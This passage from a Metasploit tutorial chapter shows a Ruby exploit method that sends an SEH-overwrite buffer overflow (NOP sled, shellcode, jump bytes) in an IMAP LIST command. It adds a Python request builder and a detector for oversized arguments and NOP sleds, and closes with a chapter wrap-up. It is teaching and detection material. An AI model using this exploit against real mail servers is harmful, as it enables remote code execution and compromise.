Creating Your Own Exploits
```ruby
  def exploit
    connected = connect_login
    # NOP sled sized so that sled + encoded payload always reach the crash offset
    lead = "\x90" * (10351 - payload.encoded.length)
    # Near jmp backwards into the NOP sled; reached via the short jmp in nseh
    near = "\xe9\xdd\xd7\xff\xff"
    # Overwritten next-SEH record: short jmp back onto the near jmp above
    nseh = "\xeb\xf9\x90\x90"
    # Buffer layout: sled + shellcode + jumps + SEH handler address (target.ret packed to 3 bytes)
    evil = lead + payload.encoded + near + nseh + [target.ret].pack("A3")
    print_status("Sending payload")
    # The oversized mailbox argument to the IMAP LIST command triggers the overflow
    sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
    sock.put(sploit)
    handler
    disconnect
  end
end
```
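The same request layout the module sends is what a network sensor would key on. The following is an added example (not code from the book or from Metasploit) that rebuilds the LIST request with constructed stand-ins for payload.encoded and target.ret, then inspects IMAP command lines for an oversized quoted argument or a NOP sled; the two thresholds are assumptions chosen for the example.

```python
import re

# Thresholds are assumptions chosen for this example, not values from the book.
MAX_ARG_LEN = 512   # legitimate IMAP mailbox names are far shorter than this
MIN_NOP_RUN = 16    # a run of 0x90 this long looks like a NOP sled, not a name

# One tagged IMAP command line: "<tag> <COMMAND> <arguments>\r\n"
IMAP_CMD = re.compile(rb'^(?P<tag>\S+) (?P<cmd>[A-Za-z]+) ?(?P<args>.*)\r\n$', re.DOTALL)
# Double-quoted IMAP string, allowing backslash escapes inside
QUOTED = re.compile(rb'"((?:[^"\\]|\\.)*)"', re.DOTALL)

def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of consecutive 0x90 (NOP) bytes in data."""
    return max((len(m.group(0)) for m in re.finditer(rb'\x90+', data)), default=0)

def inspect_imap_command(raw: bytes) -> dict:
    """Parse one IMAP command line and report overflow indicators.

    Returns the command name, the longest quoted argument length, the longest
    NOP run seen in any argument, and whether either threshold was exceeded."""
    m = IMAP_CMD.match(raw)
    if not m:
        return {"cmd": None, "max_arg_len": 0, "nop_run": 0, "suspicious": False}
    args = QUOTED.findall(m.group("args"))
    max_arg = max((len(a) for a in args), default=0)
    nop_run = max((longest_nop_run(a) for a in args), default=0)
    return {
        "cmd": m.group("cmd").upper().decode(),
        "max_arg_len": max_arg,
        "nop_run": nop_run,
        "suspicious": max_arg > MAX_ARG_LEN or nop_run >= MIN_NOP_RUN,
    }

def build_sample_list_request(payload: bytes = b"\xcc" * 300) -> bytes:
    """Rebuild the request the module's exploit method sends, using constructed
    stand-ins: payload defaults to 300 int3 bytes in place of payload.encoded,
    and b"RET" stands in for the 3-byte packed target.ret value."""
    lead = b"\x90" * (10351 - len(payload))
    near = b"\xe9\xdd\xd7\xff\xff"    # near jmp back into the NOP sled
    nseh = b"\xeb\xf9\x90\x90"        # short jmp back onto the near jmp
    evil = lead + payload + near + nseh + b"RET"
    return b'0002 LIST () "/' + evil + b'" "PWNED"' + b"\r\n"

# Constructed benign LIST request for comparison.
BENIGN_LIST = b'0001 LIST "" "*"\r\n'
```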
Wrapping Up
Although we haven’t uncovered a new vulnerability in this chapter, we have
covered the entire process from developing and running a fuzzer to developing
a functioning exploit. The exploit that we built in this chapter is complicated
and unusual, and it therefore offers an excellent opportunity to think beyond
the basics and explore creative avenues to obtain code execution.
One of the best ways to dig deeper into Metasploit is to read through the
Metasploit source files and other exploit modules to get a better idea of what
is possible within the Metasploit Framework. The techniques in this chapter
have given you the basic tools you’ll need to begin discovering vulnerabilities
and developing Metasploit exploit modules that will take advantage of them.
In the next chapter we will begin porting exploits into the Framework,
building on the knowledge you gained in this chapter.
We’ll show you how to convert publicly available exploits into a working
Metasploit exploit by rewriting the exploit and debugging it to see what it’s
doing.